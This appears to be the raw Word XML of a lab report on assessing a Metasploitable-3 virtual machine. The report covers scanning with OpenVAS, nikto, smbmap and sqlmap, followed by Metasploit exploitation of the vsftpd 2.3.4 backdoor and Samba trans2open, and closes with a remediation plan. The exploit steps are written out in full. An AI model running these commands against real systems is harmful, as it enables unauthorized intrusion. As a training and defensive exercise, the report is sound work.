        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="12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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5729605" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="6" name="Picture 6" descr="Screenshot 2025-10-01 135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0-01 13534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BF85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smbmap -H 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>132.136</w:t>
      </w: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&gt; smbmap_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>full</w:t>
      </w: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.txt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1BB7AFA4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screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C880D4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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5724525" cy="3983990"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8890"/>
            <wp:docPr id="9" name="Picture 9" descr="Screenshot 2025-10-01 135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0-01 13573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A9A3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</w:pPr>
    </w:p>
    <w:p w14:paraId="363DC91B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability Scanning — </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6A345">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1. OpenVAS / GVM scan (Web UI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC3D7E">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Steps (GUI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC04901">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>https://127.0.0.1:9392</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3AF727">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Create Target</w:t>
      </w:r>
      <w:r>
        <w:t>: Name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Courier New"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-3</w:t>
      </w:r>
      <w:r>
        <w:t>, Hosts=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Courier New"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>132.136</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Save.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31BFB6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="144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32780" cy="4879340"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="11" name="Picture 11" descr="Screenshot 2025-10-02 181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0-02 1816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C338">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Create Task</w:t>
      </w:r>
      <w:r>
        <w:t>: Select Target, Scan Config=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Full and Fast</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76D573">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="144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27700" cy="4817745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="13335"/>
            <wp:docPr id="12" name="Picture 12" descr="Screenshot 2025-10-02 181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0-02 18170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9864">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Wait for completion → Open Report → Export PDF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D502555">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F80FCAE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2. Nikto (web server vulnerabilities)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1461BD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nikto -h http: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//192.168</w:t>
      </w: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Style w:val="12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t>132.136</w:t>
      </w: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-o nikto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_</w:t>
      </w:r>
      <w:r>
        <w:rPr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t>full</w:t>
      </w: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.txt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495A3EE9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screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB0C6F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24525" cy="4099560"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="Screenshot 2025-10-01 125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0-01 12505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70914C65">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Verification &amp; Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66256C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>A. sqlmap — discovery &amp; controlled exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6ED0F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB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sqlmap -u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</w:t>
      </w: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http://192.168.132.136/phpmyadmin/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</w:t>
      </w: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--batch --level=2 --risk=1 --dbs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>&gt; sqlmap.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F94E27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Evidence placeholder:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF54498">
      <w:pPr>
        <w:pStyle w:val="14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24525" cy="4279900"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:docPr id="13" name="Picture 13" descr="Screenshot 2025-10-02 184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10-02 18470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730875" cy="4462780"/>
            <wp:effectExtent l="0" t="0" r="14605" b="2540"/>
            <wp:docPr id="14" name="Picture 14" descr="Screenshot 2025-10-02 184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10-02 1847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E059">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B. msfconsole — </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70954EFB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Start msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C51393">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E288AE1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1. vsftpd backdoor (CVE-2011-2523) — check then exploit (lab only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE2FD39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msf &gt; search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2ADA76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msf &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D0F70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msf exploit(vsftpd_234_backdoor) &gt; set RHOSTS 192.168.132.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BA0540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msf exploit(vsftpd_234_backdoor) &gt; set RPORT 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F049A8C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB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msf exploit(vsftpd_234_backdoor) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B725537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Evidence placeholders:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E569F5">
      <w:pPr>
        <w:pStyle w:val="14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29605" cy="1773555"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="Screenshot 2025-10-02 185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10-02 18535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D17A">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>. Samba trans2open (example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2DBC5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msf &gt; search trans2open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78582AD0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msf &gt; use exploit/linux/samba/trans2open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EAA971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msf exploit(trans2open) &gt; set RHOSTS 192.168.132.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303A0A6E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msf exploit(trans2open) &gt; set RPORT 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21207EF6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msf exploit(trans2open) &gt; check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB49427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# If check positive and authorized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A181282">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1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msf exploit(trans2open) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A64C4">
      <w:pPr>
        <w:pStyle w:val="14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Evidence placeholders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD4D3FD">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5730875" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="Screenshot 2025-10-02 185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10-02 18574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D2E9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Important note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Always run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> first. Only run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in lab environment after snapshot. Capture </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> output for reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490D6D5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BC02661">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation Plan (Simplified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB92780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SQL Injection (HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1DBFC5">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Use parameterized queries / prepared statements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DFDDCA">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Validate and sanitize all user inputs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21960D9F">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Apply web application firewall (WAF) rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6CA8FF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FTP Service / vsftpd (HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CF5C1">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Disable anonymous login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF46ADF">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Patch or remove vsftpd (use SFTP instead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D363941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SMB Shares (MEDIUM–HIGH)</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="33C76824">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Disable guest access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD10EE7">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Restrict shares to authorized users only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963E3C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Patch Samba to latest version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036934E0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Outdated Packages &amp; Services (HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B33D8E6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Disable unused services (Telnet, Rlogin, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC76E46">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Update/patch OS and applications regularly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE38117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Weak / Default Credentials (HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A891E0">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Change all default passwords immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34971C5E">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce strong password policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C576F60">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Implement multi-factor authentication for admin accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B5CDE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General Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD0552B">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Configure firewall to allow only required services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13966C2A">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Enable logging and monitor access attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F02A6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr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</w:pPr>
      <w:r>
        <w:t>Take regular backups and test restore procedures.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="432" w:gutter="0"/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6DC92">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict>
        <v:rect id="_x0000_i1025" o:spt="1" style="height:1.5pt;width:0pt;" fillcolor="#A0A0A0" filled="t" stroked="f" coordsize="21600,21600" o:hr="t" o:hrstd="t" o:hralign="center">
          <v:path/>
          <v:fill on="t" focussize="0,0"/>
          <v:stroke on="f"/>
          <v:imagedata o:title=""/>
          <o:lock v:ext="edit"/>
          <w10:wrap type="none"/>
          <w10:anchorlock/>
        </v:rect>
      </w:pict>
    </w:r>
  </w:p>
  <w:p w14:paraId="4658A5C1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51FCB"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-1443990</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-342265</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="8618220" cy="1024255"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapTopAndBottom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6D2"/>
    <w:rsid w:val="0000430C"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00F413A1"/>
    <w:rsid w:val="39F238D7"/>
    <w:rsid w:val="5B833382"/>
    <w:rsid w:val="5EB161C9"/>
    <w:rsid w:val="63393AA4"/>
    <w:rsid w:val="7E08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20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1">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="19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3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8"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16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7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8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9">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="10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</Words>
  <Characters>38</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>103</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>43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2025-07-21T00:34:00Z</dcterms:created>
  <dc:creator>ishan</dc:creator>
  <cp:lastModifiedBy>Ishan Chowdhury</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-02T13:30:36Z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9B3F34470B6A420BAA5534002829269A_12</vt:lpwstr>
  </property>
</Properties>
</file>